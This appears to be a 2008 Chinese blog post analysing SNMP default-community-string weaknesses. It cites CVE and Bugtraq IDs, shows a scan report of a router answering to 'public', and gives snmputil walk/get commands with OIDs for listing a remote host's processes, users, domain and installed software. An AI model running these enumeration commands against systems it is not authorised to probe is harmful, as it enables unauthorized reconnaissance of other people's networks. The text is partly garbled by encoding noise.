snmp简单网络管理协议漏洞分析
snmp简单网络管理协议漏洞分析
字体:| 发表于: 2008-4-1001:23 作者: menyuchun来源: IXPUB技术博客
简单网络管理协议(SNMP)是一个?可以远程管理计算机和网络设备的协议.
有两种典型的远程监控模式.
他们可以粗略地分为"读"和"写"(或者是PUBLIC和PRIVATE).?如果攻击者能猜出一个P UBLIC团体串值,?那么他就可以从远程设备读取SNMP数据.?这个信息可能包括?系统时间,IP地址,接口,运行着的进程,etc等.?如果攻击者猜出一个PRIVATE团体串值
(写入或"完全控制",
他就有更改远程机器上信息的能力.?这会是一个极大的安全漏洞,
能让攻击者成功地破坏网络,运行的进程,ect.?其实,"完全控制"会给远程攻击者提供在主机上的完全管理权限.???更多信息请参见:
_________________________________________________________
__________
?
SNMPAgentrespondedas expected withcommunity name:pub lic?CVE_ID :CAN-1999-0517,CAN-1999-0186,CAN-1999-0254, CAN-1999-0516
BUGTRAQ_ID: 11237, 10576,177,2112,6825, 7081, 7212,7317, 9681, 986?NESSUS_ID:10264
Other references :IAVA:2001-B-0001??
SNMP服务在UDP 161/162端口监听?用法:snmputilwalkIP public[OID]?[----------OID-----------------------含义-------]
.1.3.6.1.2.1.25.4.2.1.2 获取系统进程
.1.3.6.1.4.1.77.1.2.25.1.1获取用户列表
.1.3.6.1.4.1.77.1.4.1.0 获取域名?.1.3.6.1.2.1.25.6.3.1.2 获取安装的软件?.1.3.6.1.2.1.1 获取系统信息
?--------------------------------------------------------------------?
扫描到的一个报告:
. 端口"snmp (161/udp)"发现安全漏洞:
?Snmp口令:
"public"?
?.端口"snmp (161/udp)"发现安全提示:
?? sysDescr.0 = Draytek V3300 Advanced Router
sysUpTime.0 =3 Days, 1Hours, 53Minutes, 10Seconds?sy
sContact.0 =admin@router
sysName.0 =V3300c?? sysLocation.0 = Hsin Chu
sysServices.0 =0?
目的:得到远程目标的系统敏感信息??简单利用方法
?这里的public使用来查询对方信息时所用到的密码
具体的做法:要用到一个叫snmputil的东西,这个东西在win2000的resource kit中有,通过它我们可以通过snmp服务来查看对方的一些信息
格式:snmputil get(orwalkor getnext)public oid
get和括号里的时获取对方机器信息的一种方法,public就是查寻的时候要用的密码。oid 是被查询设备的ID号码?
例如:snmputil walk 111.111.111.111 public.1.3.6.1.2.1.25.4.2.1.2??snmputil walk ip public .1.3.6.1.2.1.25.4.2.1.2(列出系统进程)
snmputil walk ip public.1.3.6.1.4.1.77.1.2.25.1.1(列出系统用户列表)
snmputil get ippublic .1.3.6.1.4.1.77.1.4.1.0(列出域名)?snmputil walk ip pub lic .1.3.6.1.2.1.25.6.3.1.2(列出安装软件)
snmputillwalkip public .1.3.6.1.2.1(列出系统信息)
?
?